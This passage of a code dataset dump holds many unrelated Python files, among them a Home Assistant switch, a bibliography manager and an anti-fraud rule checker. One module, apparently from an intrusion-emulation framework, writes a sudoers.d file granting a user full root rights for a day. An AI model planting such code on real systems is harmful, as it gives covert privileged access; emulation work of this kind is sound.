Then I can use indexes for search\nVALUES_CHUNKED_BY_YEARS = list(chunked(search('value', JSON_LINK), len(COUNTRIES)))\n\n\ndef best3_and_worst3_unemployment_rate_by_years():\n    for i in VALUES_CHUNKED_BY_YEARS:\n        print(YEARS[VALUES_CHUNKED_BY_YEARS.index(i)] + \"\\nLowest unemployment rate:\")\n        for value in nsmallest(3, i):\n            print(COUNTRIES[i.index(value)] + ': ' + str(value) + '%')\n        print(\"\\nHighest unemployment rate:\")\n        for value in nlargest(3, i):\n            print(COUNTRIES[i.index(value)] + ': ' + str(value) + '%')\n        print('\\n')\n\n\nif __name__ == '__main__':\n    best3_and_worst3_unemployment_rate_by_years()\n","sub_path":"TietoEVRY.py","file_name":"TietoEVRY.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"70940934","text":"import time\nprimes = []\nstart = time.time()\nfor i in range(100000):\n    primes.append(0)\ninit = time.time()\nprint(\"init took\", init - start, \"seconds\")\nprimecount = 0\nfor i in range(2,100000):\n    is_prime = True\n    for index in range(0, primecount):\n        if i%primes[index] == 0:\n            is_prime = False\n            break\n    if is_prime:\n        primes[primecount] = i\n        primecount += 1\nprint(\"Found \", primecount, \"primes\")\nprint(\"search took\", time.time() - init, \"seconds\")\n","sub_path":"Topics/16_Speed/src/primes2.py","file_name":"primes2.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"337155705","text":"#coding=utf-8\n'''\n@author=Wangminhao Gou\n'''\n\nimport csv\ninputFile=r'E:\\DataAnalysis2\\dataset\\testSet.csv'\noutputFile=r'E:\\DataAnalysis2\\dataset\\testSet2.csv'\ndef datafill():\n    with open(inputFile,'r') as inp1,open(outputFile,'w',newline='') as out1:\n        rows=csv.reader(inp1)\n\n        writer=csv.writer(out1)\n        for row in rows:\n            for i in range(0,len(row)):\n                if row[i]=='':\n                    row[i]=0\n            writer.writerow(row)\n\nif __name__=='__main__':\n    datafill()","sub_path":"src/datafill2.py","file_name":"datafill2.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"56349178","text":"import asyncio\nimport json\nimport logging\nfrom functools import partial\n\nimport homeassistant.helpers.config_validation as cv\nimport voluptuous as vol\nfrom homeassistant.components.switch import PLATFORM_SCHEMA, SwitchEntity\nfrom homeassistant.const import CONF_HOST, CONF_NAME, CONF_TOKEN\nfrom homeassistant.exceptions import PlatformNotReady\nfrom miio.device import Device\nfrom miio.exceptions import DeviceException\nfrom miio.miot_device import MiotDevice\n\nfrom . 
import ToggleableMiotDevice\nfrom .deps.const import (\n DOMAIN,\n CONF_UPDATE_INSTANT,\n CONF_MAPPING,\n CONF_CONTROL_PARAMS,\n CONF_CLOUD,\n CONF_MODEL,\n ATTR_STATE_VALUE,\n ATTR_MODEL,\n ATTR_FIRMWARE_VERSION,\n ATTR_HARDWARE_VERSION,\n SCHEMA,\n)\n\nDOMAIN = 'xiaomi_miot_raw'\n\n_LOGGER = logging.getLogger(__name__)\n\nDEFAULT_NAME = \"Generic MIoT switch\"\nDATA_KEY = \"switch.\" + DOMAIN\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(\n # {\n # vol.Required(CONF_HOST): cv.string,\n # vol.Required(CONF_TOKEN): vol.All(cv.string, vol.Length(min=32, max=32)),\n # vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,\n # vol.Optional(CONF_UPDATE_INSTANT, default=True): cv.boolean,\n # vol.Optional(CONF_CLOUD): vol.All(),\n \n # vol.Required(CONF_MAPPING):vol.All(),\n # vol.Required(CONF_CONTROL_PARAMS):vol.All(),\n # vol.Optional('cloud_write'):vol.All(),\n\n # }\n SCHEMA\n)\n\n# pylint: disable=unused-argument\n@asyncio.coroutine\ndef async_setup_platform(hass, config, async_add_entities, discovery_info=None):\n \"\"\"Set up the sensor from config.\"\"\"\n\n if DATA_KEY not in hass.data:\n hass.data[DATA_KEY] = {}\n\n host = config.get(CONF_HOST)\n token = config.get(CONF_TOKEN)\n mapping = config.get(CONF_MAPPING)\n\n _LOGGER.info(\"Initializing %s with host %s (token %s...)\", config.get(CONF_NAME), host, token[:5])\n\n try:\n miio_device = MiotDevice(ip=host, token=token, mapping=mapping)\n device_info = miio_device.info()\n model = device_info.model\n _LOGGER.info(\n \"%s %s %s detected\",\n model,\n device_info.firmware_version,\n device_info.hardware_version,\n )\n\n device = MiotSwitch(miio_device, config, device_info, hass)\n except DeviceException:\n raise PlatformNotReady\n\n hass.data[DOMAIN]['entities'][device.unique_id] = device\n async_add_entities([device], update_before_add=True)\n\nasync def async_setup_entry(hass, config_entry, async_add_entities):\n config = hass.data[DOMAIN]['configs'].get(config_entry.entry_id, dict(config_entry.data))\n await async_setup_platform(hass, config, async_add_entities)\n\nclass MiotSwitch(ToggleableMiotDevice, SwitchEntity):\n pass\n","sub_path":"custom_components/xiaomi_miot_raw/switch.py","file_name":"switch.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"426710094","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport os\n\nfrom bibpdf import database\nfrom bibpdf.file_object import PdfFile, CommentFile, PdfTempFile, BibTempFile\nfrom bibpdf.formatters import simple_format, misc, bibtex_format, file_name_format\n\npath = os.path\n\n\nclass Action(object):\n def __init__(self, func, arguments=list(), optional_arguments=None):\n self.func = func\n self.arguments = arguments\n self.optional_arguments = optional_arguments\n\n def execute(self):\n if self.optional_arguments:\n self.func(*self.arguments, **self.optional_arguments)\n else:\n self.func(*self.arguments)\n\n\ndef store_paper(args):\n new_keyword = {x.strip() for x in ' '.join(args.keyword).split(',')} if args.keyword else set()\n from bibpdf.readers import bibtex_read\n bib_file = BibTempFile()\n entry = bibtex_read.read(bib_file.open()).entries[0]\n entry['keyword'] = entry['keyword'] | new_keyword if 'keyword' in entry else new_keyword\n db = database.Database()\n\n print(simple_format.apply(entry))\n try:\n temp_pdf_file = PdfTempFile()\n print('\\tFile: {0}'.format(temp_pdf_file.file_name))\n except IOError:\n temp_pdf_file = None\n 
print('\\tFile: None')\n if input('(a)abort, (c)continue?') != 'c':\n print(\"aborted\")\n return\n\n actions = list()\n\n entry['ID'] = misc.get_id(entry)\n while entry['ID'] in db:\n old_id = entry['ID']\n old_entry = db[old_id]\n print('citation conflict!')\n print(simple_format.apply(old_entry))\n choice = input('(a)abort, (u)update entry, Input new citation?')\n if choice == 'a':\n print('aborted')\n return\n elif choice == 'u':\n break\n else:\n entry['ID'] = choice\n\n for position in ('author', 'editor'):\n if position in entry:\n for idx, person in enumerate(entry[position]):\n person_list = db.search_author(person[0], False)\n first_names = {x[1] for x in person_list}\n if not person_list or any(person[1] == name for name in first_names):\n continue\n print((\"Who's this author? ({0[0]}, {0[1]})\".format(person)))\n for idx2, old_person in enumerate(person_list):\n print(('{0}. {1}, {2}'.format(idx2, old_person[0].title(), old_person[1].title())))\n choice = input(\"(a)abort, or type 'number,new_name'\\n\").lower().strip()\n new_name = None\n if ',' in choice:\n choice, new_name = [a.strip() for a in choice.split(',', maxsplit=2)]\n if choice == 'a':\n print('aborted')\n return\n elif choice == 'n': # use new author\n person[1] = new_name if new_name else person[1]\n else:\n number = int(choice)\n if new_name:\n person[1] = new_name\n actions.append(Action(db.update_person, [person_list[number], person]))\n else:\n person[1] = person_list[number][1]\n\n for action in actions:\n action.execute()\n if temp_pdf_file:\n if 'pdf_file' not in entry and entry['ID'] in db and 'pdf_file' in db[entry['ID']]:\n entry['pdf_file'] = db[entry['ID']]['pdf_file']\n if 'pdf_file' not in entry:\n file_name = file_name_format.apply(entry)\n pdf_file = PdfFile(file_name, entry)\n temp_pdf_file.move(pdf_file)\n entry['pdf_file'] = [pdf_file.file_name]\n else: # add or replace file\n print(\"pdf_file exists!\")\n for idx, file_name in enumerate(entry['pdf_file']):\n print(idx, file_name)\n choice = input(\"(c)do nothing; (N) replace the Nth file; or put a short word as new file's suffix\")\n if choice != 'c':\n try:\n number = int(choice)\n file_name = entry['pdf_file'][number]\n pdf_file = PdfFile(file_name, entry)\n temp_pdf_file.move(pdf_file)\n except ValueError:\n file_name = file_name_format.apply(entry, choice)\n pdf_file = PdfFile(file_name, entry)\n temp_pdf_file.move(pdf_file)\n entry['pdf_file'].append(pdf_file.file_name)\n db[entry['ID']] = entry\n print('successfully inserted the following entry:')\n print(simple_format.apply(entry))\n\n\ndef search_paper(args):\n db = database.Database()\n if args.author:\n if args.keyword:\n keyword = {x.strip() for x in ' '.join(args.keyword).split(',')}\n author_list = db.search_author_keyword(args.author, keyword)\n else:\n author_list = db.search_author(args.author)\n print(misc.author_list(author_list))\n else:\n keyword = {x.strip() for x in ' '.join(args.keyword).split(',')}\n item_list = db.search_keyword(keyword)\n print(misc.item_list(item_list))\n\n\ndef open_file(args):\n db = database.Database()\n if args.paper_id not in db:\n print(\"{0} cannot be found in library\".format(args.paper_id))\n return\n if not args.files:\n args.files = ['pdf']\n\n entry = db[args.paper_id]\n for file_type in set(args.files):\n if file_type == 'pdf':\n pdf_files = [PdfFile(file_name) for file_name in entry['pdf_file']]\n if len(pdf_files) == 0:\n print(\"I don't have pdf file for {0}\\n\".format(args.paper_id))\n else:\n for file in pdf_files:\n file.open()\n 
if file_type == 'comment':\n comment_files = [CommentFile(file_name) for file_name in entry['comment_file']]\n if len(comment_files) == 0:\n new_comment = CommentFile(entry['ID'], entry)\n entry['comment_file'].append(new_comment.file_name)\n new_comment.open()\n db.add_file(entry['ID'], new_comment.file_name, 'comment')\n else:\n for file in comment_files:\n file.open()\n\n\ndef output(args) -> str:\n from bibpdf.readers import pandoc_read\n db = database.Database()\n if path.isfile(path.expanduser(args.source)):\n item_list = [db[item_id] for item_id in pandoc_read.read(open(args.source, 'r', encoding='UTF-8'))]\n elif args.source.lower() == 'all':\n item_list = list(db.values())\n else:\n item_list = [db[item_id.strip()] for item_id in args.source.split(',')]\n if args.format == 'bib':\n print(bibtex_format.apply(item_list))\n elif args.format == 'str':\n print(simple_format.apply(item_list))\n\n\ndef delete_paper(args):\n db = database.Database()\n del db[args.paper_id]\n print('{0} has been successfully deleted'.format(args.paper_id))\n\n\ndef modify_keyword(args):\n to_add = None\n to_delete = None\n if args.add:\n to_add = {x.strip() for x in ' '.join(args.add).split(',')}\n if args.delete:\n to_delete = {x.strip() for x in ' '.join(args.delete).split(',')}\n db = database.Database()\n if to_add or to_delete:\n db.update_keyword(args.paper_id, to_add, to_delete)\n entry = db[args.paper_id]\n print(simple_format.apply(entry))\n print('\\tKeywords: {0}'.format(', '.join(entry['keyword'])))\n\n\ndef main():\n parser = argparse.ArgumentParser(\"bibpdf\", description=\"a tool to manage literature library\",\n epilog=\"citation is usually $first_author_last_name$year\")\n subparsers = parser.add_subparsers(help='commands')\n\n search_parser = subparsers.add_parser('s', help='search paper')\n search_parser.set_defaults(func=search_paper)\n search_parser.add_argument('-a', '--author')\n search_parser.add_argument('-k', '--keyword', nargs=\"+\")\n\n open_parser = subparsers.add_parser('o', help='open file')\n open_parser.set_defaults(func=open_file)\n open_parser.add_argument('paper_id')\n open_parser.add_argument('-c', '--comment', dest='files', action='append_const', const='comment')\n open_parser.add_argument('-p', '--pdf', dest='files', action='append_const', const='pdf')\n\n add_parser = subparsers.add_parser('a', help='add entry')\n add_parser.set_defaults(func=store_paper)\n add_parser.add_argument('keyword', nargs=\"*\", help='give a list of keyword separated by colons')\n\n add_parser = subparsers.add_parser('d', help='delete entry')\n add_parser.set_defaults(func=delete_paper)\n add_parser.add_argument('paper_id')\n\n output_parser = subparsers.add_parser('u', help='output information')\n output_parser.set_defaults(func=output)\n output_parser.add_argument('source', help=\"supply a list of paper ids or find Pandoc token file \"\n \"to extract a minimal reference list\")\n output_format = output_parser.add_mutually_exclusive_group(required=True)\n output_format.add_argument('-b', '--bibtex', dest=\"format\", action='store_const', const='bib',\n help='output bibtex file')\n output_format.add_argument('-s', '--string', dest=\"format\", action='store_const', const='str',\n help='output a simple string')\n\n key_parser = subparsers.add_parser('k', help='manipulate keywords')\n key_parser.set_defaults(func=modify_keyword)\n key_parser.add_argument('paper_id')\n key_parser.add_argument('-a', '--add', nargs=\"+\", help='keywords to add, separate by colon')\n key_parser.add_argument('-d', 
'--delete', nargs=\"+\", help='keywords to delete, separate by colon')\n\n args = parser.parse_args()\n try:\n args.func(args)\n except AttributeError:\n parser.print_help()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"bibpdf/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"632186225","text":"def sumgcd(n):\n for i in range(2, n):\n if n / i == n // i:\n return n // i, n - n // i\n return 1, n - 1\n\n\nsumgcd_in = open('sumgcd.in', 'r')\nsumgcd_out = open('sumgcd.out', 'w')\n\nn = int(sumgcd_in.readline())\nans = sumgcd(n)\nprint(*ans, file=sumgcd_out)\nsumgcd_in.close()\nsumgcd_out.close()\n","sub_path":"lKSH/final/sumgcd.py","file_name":"sumgcd.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"340129197","text":"import os\nimport json\n\nimport uuid\nimport shutil\n\nimport rino.core.config as config\nfrom rino.core.commit import Commit\nfrom rino.core.tree import TreeCollection\n\n\nclass UIDExists(Exception):\n pass\n\n\nclass NameExists(Exception):\n pass\n\n\nclass Repository:\n \"\"\"\n Repository.\n\n Handles the creation and info on a repo.\n Also acts as a collection of commits.\n \"\"\"\n\n rinofile_proto = {\n \"uid\": \"\",\n \"commits\": [],\n \"tree\": [],\n \"remote\": []\n }\n\n def __init__(self, directory=None):\n if directory is None:\n directory = os.getcwd()\n\n self.info = None\n self.saved = False\n self.parent = directory\n self.dir = os.path.join(directory, 'rino')\n self.rinofile_path = os.path.join(self.dir, 'rinofile.json')\n\n if os.path.isfile(self.rinofile_path) and os.path.isdir(self.dir):\n self.saved = True\n\n if self.saved is False:\n self.info = self.rinofile_proto\n self.info[\"uid\"] = str(uuid.uuid4()).replace('-', '')\n\n if self.info is None:\n self.info = json.load(open(self.rinofile_path))\n\n def __getitem__(self, key):\n return self.info[key]\n\n def __setitem__(self, key, value):\n self.info[key] = value\n self.write_config()\n\n def write_config(self):\n with open(self.rinofile_path, 'w') as outfile:\n return json.dump(self.info, outfile, indent=3, sort_keys=True)\n\n def save(self):\n if os.path.isfile(self.rinofile_path) and os.path.isdir(self.dir):\n self.saved = True\n return False, 'repository already exists.'\n else:\n self.saved = True\n os.makedirs(self.dir)\n config.append(\"repositories\", self.dir)\n self.write_config()\n return True, 'initialised rino repository.'\n\n def add(self, rel_paths, parameter=False, compare_uid=None):\n\n if compare_uid is None:\n last_commit = Commit(self, self.find('checkedout'))\n else:\n last_commit = Commit(self, compare_uid)\n\n abspaths = [os.path.join(self.parent, ppath) for ppath in rel_paths]\n tr = TreeCollection(abspaths, self.parent)\n tr.compare_status(self.parent, last_commit.dir)\n\n self.info[\"tree\"] = tr.tree\n\n if self.saved:\n self.write_config()\n\n return True, \"Added files.\"\n\n def add_remote(self, name, path):\n if name in [v[\"name\"] for v in self.info[\"remote\"]]:\n return False, 'name aleady exists.'\n\n self.info[\"remote\"].append({\n 'name': name,\n 'path': path\n })\n\n self.write_config()\n\n def remove_remote(self, name):\n if name in [v[\"name\"] for v in self.info[\"remote\"]]:\n filtered = [v for v in self.info[\"remote\"] if not v[\"name\"] == name]\n self.info[\"remote\"] = filtered\n self.write_config()\n\n def 
uid_to_name(self, uid):\n        t = [x[\"name\"] for x in self.info[\"commits\"] if x[\"uid\"] == uid]\n        if len(t):\n            return os.path.join(self.dir, t[0])\n        else:\n            return None\n\n    def name_to_uid(self, name):\n        # info[\"commits\"] is a list of dicts, so iterate it directly\n        for item in self.info[\"commits\"]:\n            if item[\"name\"] == name:\n                return item[\"uid\"]\n        return None\n\n    def checkout(self, commit):\n        d = {\n            \"uid\": commit[\"uid\"],\n            \"name\": commit[\"name\"],\n            \"date\": commit[\"date\"]\n        }\n        self.info[\"checkedout\"] = d\n        self.write_config()\n\n    def register_commit(self, uid, info):\n        if uid in [x[\"uid\"] for x in self.info[\"commits\"]]:\n            raise UIDExists(\"uid <\" + uid + \"> already exists.\")\n        if info[\"name\"] in [x[\"name\"] for x in self.info[\"commits\"]]:\n            raise NameExists(\"name <\" + info[\"name\"] + \"> already exists.\")\n\n        d = {\n            \"uid\": info[\"uid\"],\n            \"name\": info[\"name\"],\n            \"date\": info[\"date\"]\n        }\n\n        self.info[\"commits\"].append(d)\n        self.info[\"checkedout\"] = d\n        self.info[\"tree\"] = []\n        self.write_config()\n\n    def find(self, key, val=None):\n        if key == \"checkedout\":\n            if self.is_any_commits():\n                return self.info[\"checkedout\"][\"uid\"]\n        if key == \"latest\":\n            if self.is_any_commits():\n                self.info[\"commits\"].sort(key=lambda item: item['date'], reverse=True)\n                return self.info[\"commits\"][0][\"uid\"]\n            else:\n                return False\n        return False\n\n    def find_by_partial(self, partial_uid):\n        if len(partial_uid) < 6:\n            return False, \"pass at least 6 digits of the uid.\"\n\n        uids = [item[\"uid\"] for item in self.info[\"commits\"]]\n        matches = [s for i, s in enumerate(uids) if partial_uid in s]\n\n        if len(matches):\n            return matches[0]\n        else:\n            return None\n\n    def is_any_commits(self):\n        return len(self.info[\"commits\"]) > 0\n\n    def size(self):\n        size = 0\n        num_files = 0\n\n        for item in self.info[\"commits\"]:\n            commit = Commit(self, item[\"uid\"])\n\n            size += commit[\"size\"]\n            num_files += commit[\"num_files\"]\n\n        size_str = TreeCollection.h_string(size)\n\n        return num_files, size, size_str\n\n    def zip(self):\n        zipname = os.path.join(self.parent, 'rino')\n        shutil.make_archive(zipname, 'zip', self.dir)\n        return zipname\n","sub_path":"rino/core/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":5548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"617713513","text":"from imassbank.riskModel.common.codeEnum import riskRuleCode\n\nfrom imassbank.riskModel.common.riskRuleResult import save_check_result\nfrom .Neo4jHandler import Neo4jHandler\n\n\ndef is_neo4j_rule_pass(model_no, json_data, order_id):\n    \"\"\"\n    Neo4j anti-fraud rule filtering\n    :param model_no:\n    :param json_data:\n    :param order_id:\n    :return:\n    \"\"\"\n    handler = Neo4jHandler()\n\n    final_result = []\n    if not handler.parse_data(model_no, json_data):\n        final_result.append(riskRuleCode.DATA_PARSE_ERROR.name)\n    else:\n        # ID-card binding check\n        if handler.check_id_num_bind():\n            result = 0\n            final_result.append(riskRuleCode.ID_CARD_MULT_BIND.name)\n        else:\n            result = 1\n        save_check_result(order_id, riskRuleCode.ID_CARD_MULT_BIND.name, result, result)\n\n        # Phone-number binding check\n        if handler.check_phone_num_bind():\n            result = 0\n            final_result.append(riskRuleCode.PHONE_NUM_MULT_BIND.name)\n        else:\n            result = 1\n        save_check_result(order_id, riskRuleCode.PHONE_NUM_MULT_BIND.name, result, result)\n\n        # Emergency-contact binding check\n        if handler.check_emerg_contact():\n            result = 0\n            final_result.append(riskRuleCode.EMERG_CON_MULT_BIND.name)\n        else:\n            result = 1\n        save_check_result(order_id, 
riskRuleCode.EMERG_CON_MULT_BIND.name, result, result)\n\n        # Emergency contact has applied recently\n        if handler.check_emerg_apply():\n            result = 0\n            final_result.append(riskRuleCode.EMERG_CON_REC_APPLY.name)\n        else:\n            result = 1\n        save_check_result(order_id, riskRuleCode.EMERG_CON_REC_APPLY.name, result, result)\n\n    handler.close()\n    return final_result\n","sub_path":"riskcontrol/imassbank/riskModel/antifraud/neo4jcheck.py","file_name":"neo4jcheck.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"495592709","text":"import PyWaMG as wp\r\nimport datetime as dt\r\nnow = dt.datetime.now()\r\nwp.wa_login(isHeadless=False)\r\n\r\nnumber=\"+918866663221\"\r\n\r\nfpath=\"D:/ARTH/SummerInternship2021/task6/Face Recognition/img.jpg\"\r\nmsg = \"ALERT! ALERT! ALERT!\"\r\n\r\nwp.send_txt(number,msg,wait=0,times=1,appendMessageNumber = True,isInContacts = True,showLogs = True)\r\nwp.send_file(number,fpath,isInContacts=False,showLogs=True) ","sub_path":"whatsapp.py","file_name":"whatsapp.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"402774176","text":"import Tkinter as tk\n\nfrom area_console import AreaConsole\nfrom area_dissected_stream import AreaDissectedStream\nfrom area_dissector_builder import AreaDissectorBuilder\nfrom area_packet_stream import AreaPacketStream\nfrom area_project_navigation import AreaProjectNavigation\nfrom area_raw_data import AreaRawData\nfrom dialog_export_project import DialogExportProject\nfrom dialog_generate_dissector_script import DialogGenerateDissectorScript\nfrom dialog_import_project import DialogImportProject\nfrom dialog_new_project import DialogNewProject\nfrom dialog_open_pcap import DialogOpenPCAP\nfrom dialog_organize_views import DialogOrganizeViews\nfrom dialog_workspace_launcher import DialogWorkspaceLauncher\n\nclass WindowType():\n    WINDOW_FIELD = 0\n    WINDOW_START_FIELD = 1\n    WINDOW_END_FIELD = 2\n    WINDOW_RLIST = 3\n    WINDOW_PINFO = 4\n    WINDOW_WORKSPACE_LAUNCHER=5\n    WINDOW_NEW_PROJECT=6\n    WINDOW_DISSECTOR_SCRIPT=7\n    WINDOW_PROJECT_IMPORT=8\n    WINDOW_PROJECT_EXPORT=9\n    WINDOW_ORGANIZE_VIEWS=10\n    WINDOW_OPEN_PCAP=11\n\nclass AreaWorkspace(tk.Tk):\n    def new_window(self, type):\n        if type == WindowType.WINDOW_WORKSPACE_LAUNCHER:\n            form = DialogWorkspaceLauncher(None)\n        elif type == WindowType.WINDOW_NEW_PROJECT:\n            form = DialogNewProject(None)\n        elif type == WindowType.WINDOW_DISSECTOR_SCRIPT:\n            form = DialogGenerateDissectorScript(None)\n        elif type == WindowType.WINDOW_PROJECT_IMPORT:\n            form = DialogImportProject(None)\n        elif type == WindowType.WINDOW_PROJECT_EXPORT:\n            form = DialogExportProject(None)\n        elif type == WindowType.WINDOW_ORGANIZE_VIEWS:\n            form = DialogOrganizeViews(None)\n        elif type == WindowType.WINDOW_OPEN_PCAP:\n            form = DialogOpenPCAP(None)\n\n    def __init__(self):\n        tk.Tk.__init__(self)\n        self.title('Protocol Dissector Generator System')\n\n        import workspace\n        workspace.Workspace.current = workspace.Workspace('Example')\n\n        center = tk.Frame(self)\n        top = tk.Frame(self)\n        left = AreaProjectNavigation(self)\n        center.grid(row=1,column=1, sticky='NEWS', padx=0, pady=2)\n        top.grid(row=0,column=1, sticky='N', padx=2, pady=2)\n        left.grid(row=1,column=0, sticky='NS', padx=1, pady=2)\n\n        pcap_path = \"C:\\\\Users\\\\xeroj\\Desktop\\\\Local_Programming\\\\Python-Software-GUI\\\\example\\\\icmp.pcap\"\n        lua_path = 
\"C:\\\\Users\\\\xeroj\\Desktop\\\\Local_Programming\\\\Python-Software-GUI\\\\example\\\\icmp.lua\"\n\n center_top = AreaDissectorBuilder(center)\n center_bottom = tk.Frame(center)\n psa = AreaPacketStream(center_bottom)\n dsa = AreaDissectedStream(center_bottom)\n dsa.get_info(pcap_path,lua_path)\n rda = AreaRawData(center_bottom)\n rda.get_raw(pcap_path)\n ca = AreaConsole(center_bottom)\n\n center_top.grid(column=0,row=0, sticky=\"NS\")\n center_bottom.grid(column=0, row=1, sticky='NS')\n psa.grid(column=0,row=0,sticky='NE')\n dsa.grid(column=1,row=0,sticky='NE')\n rda.grid(column=2,row=0,sticky='NE')\n ca.grid(column=3,row=0,sticky='NE')\n\n button_createProject = tk.Button(top, text='Create Project', command=lambda:self.new_window(WindowType.WINDOW_NEW_PROJECT))\n button_saveProject = tk.Button(top, text='Save Project')\n button_closeProject = tk.Button(top, text='Close Project', command=lambda:self.quit())\n button_switchWorkspace = tk.Button(top, text='Switch Workspace', command=lambda:self.new_window(WindowType.WINDOW_WORKSPACE_LAUNCHER))\n button_importProject = tk.Button(top, text='Import Project', command=lambda:self.new_window(WindowType.WINDOW_PROJECT_IMPORT))\n button_exportProject = tk.Button(top, text='Export Project', command=lambda:self.new_window(WindowType.WINDOW_PROJECT_EXPORT))\n button_generateDissectorS = tk.Button(top, text='Generate Dissector Script', command=lambda:self.new_window(WindowType.WINDOW_DISSECTOR_SCRIPT))\n button_organizeViews = tk.Button(top, text='Organize Views', command=lambda:self.new_window(WindowType.WINDOW_ORGANIZE_VIEWS))\n button_openPCAP = tk.Button(top, text='Open PCAP', command=lambda:self.new_window(WindowType.WINDOW_OPEN_PCAP))\n\n # place the buttons in the top frame\n button_createProject.grid(row=0, column=0, padx=5, pady=2)\n button_saveProject.grid(row=0, column=1, padx=5, pady=2)\n button_closeProject.grid(row=0, column=2, padx=5, pady=2)\n button_switchWorkspace.grid(row=0, column=3, padx=5, pady=2)\n button_importProject.grid(row=0, column=4, padx=5, pady=2)\n button_exportProject.grid(row=0, column=5, padx=5, pady=2)\n button_generateDissectorS.grid(row=0, column=6, padx=5, pady=2)\n button_organizeViews.grid(row=0, column=7, padx=5, pady=2)\n button_openPCAP.grid(row=0, column=8, padx=5, pady=2)","sub_path":"area_workspace.py","file_name":"area_workspace.py","file_ext":"py","file_size_in_byte":4906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"268548117","text":"'''\r\n2) Escreva um algoritmo para ler as dimensões de um retângulo (base e altura),\r\ncalcular e escrever a área do retângulo, e caso seja um quadrado, exibir a frase: área de um quadrado\r\n'''\r\n\r\nbase = int(input(\"base\"))\r\naltura = int(input(\"altura\"))\r\n\r\narea = base*altura\r\n\r\nprint(\"a área é 5\" + str(area))\r\n\r\nif base == altura:\r\n print(\"área de um quadrado\")\r\n","sub_path":"dimensoes-retangulo.py","file_name":"dimensoes-retangulo.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"173839950","text":"'''\nPut the data(from the database) to the task queue.\n'''\nimport get_submit_to_judge\nimport change_status\nimport time\nimport config\nimport db_connect\nfrom datetime import datetime\nimport MySQLdb\n\n \ndef traversal_database(task_queue, db_lock):\n '''\n traversal the database every 1 seconds, if there are some tasks didn't\n be judged, these process will be blocked.\n '''\n 
while True:\n        # block until all previously queued tasks have been processed.\n        task_queue.join()\n        with db_lock:\n            # connect to the database.\n            db = db_connect.db_connect()\n            # use the Lock when connecting to the database\n            data_for_judge = get_submit_to_judge.get_submit_to_judge(db)\n            if data_for_judge is not None:\n                for submit_id, problem_id, lang, code_path, judge_status, time_limits, memory_limits in data_for_judge:\n                    item_dict = {\n                        'submit_id': submit_id,\n                        'problem_id': problem_id,\n                        'lang': lang,\n                        'code_path': code_path,\n                        'judge_status': judge_status,\n                        'time_limits': int(time_limits), # MS\n                        'memory_limits': int(memory_limits) # KB\n                    }\n                    # put the data onto the task queue (shared with the judge processes).\n                    task_queue.put(item_dict)\n                    # update the submit status to Queuing\n                    change_status.change_status(item_dict, db, 12)\n            # close the connection\n            db.close() \n        # sleep for 1 second.\n        time.sleep(1)\n\nif __name__ == '__main__':\n    from multiprocessing import Lock, JoinableQueue\n    db_lock = Lock()\n    # a JoinableQueue is needed so join()/task_done() work across processes\n    task_queue = JoinableQueue()\n    traversal_database(task_queue, db_lock)\n","sub_path":"get_task.py","file_name":"get_task.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"422586969","text":"try:\n    from framework.main import ModuleBase\nexcept ImportError:\n    pass\n\nclass UserAddSudoers(ModuleBase):\n    \"\"\" creates a sudoers.d file for the user \"\"\"\n    @property\n    def tags(self):\n        return ['IntrusionSet4']\n\n    @property\n    def needs_root(self):\n        return True\n\n    @property\n    def relative_delay(self):\n        return 80\n\n    @property\n    def absolute_duration(self):\n        return 24 * 60 * 60 # 1 day\n\n    def do_run(self):\n        import os, stat, time\n        username = '${USER_NAME}'\n        fname = '/etc/sudoers.d/${SUDOERS_FNAME}~'\n        try:\n            if not os.path.exists('/etc/sudoers.d'):\n                os.mkdir('/etc/sudoers.d', mode=0o755)\n            if not os.path.exists('/etc/sudoers.d') or not os.path.isdir('/etc/sudoers.d'):\n                self.hec_logger('Error: /etc/sudoers.d directory does not exist!', severity='error')\n                return\n            with open(fname, 'w+') as f:\n                f.write('{0} ALL=(ALL:ALL) ALL'.format(username))\n            os.chmod(fname, stat.S_IRUSR | stat.S_IRGRP)\n            self.hec_logger('Created a sudoers.d file', username=username, fname=fname)\n        except Exception as e:\n            self.hec_logger(str(e), severity='error')\n            return\n        time.sleep(self.absolute_duration)\n        try:\n            os.unlink(fname)\n            self.hec_logger('Removed sudoers.d file', username=username, fname=fname)\n        except Exception as e:\n            self.hec_logger(str(e), severity='error')\n\n    def run(self):\n        self.start()\n        try:\n            self.do_run()\n        except Exception as e:\n            self.hec_logger('Uncaught exception within module, exiting module gracefully', error=str(e),\n                            severity='error')\n        self.finish()\n","sub_path":"framework/modules/sudoerfile.py","file_name":"sudoerfile.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"415172837","text":"# Prepare data for 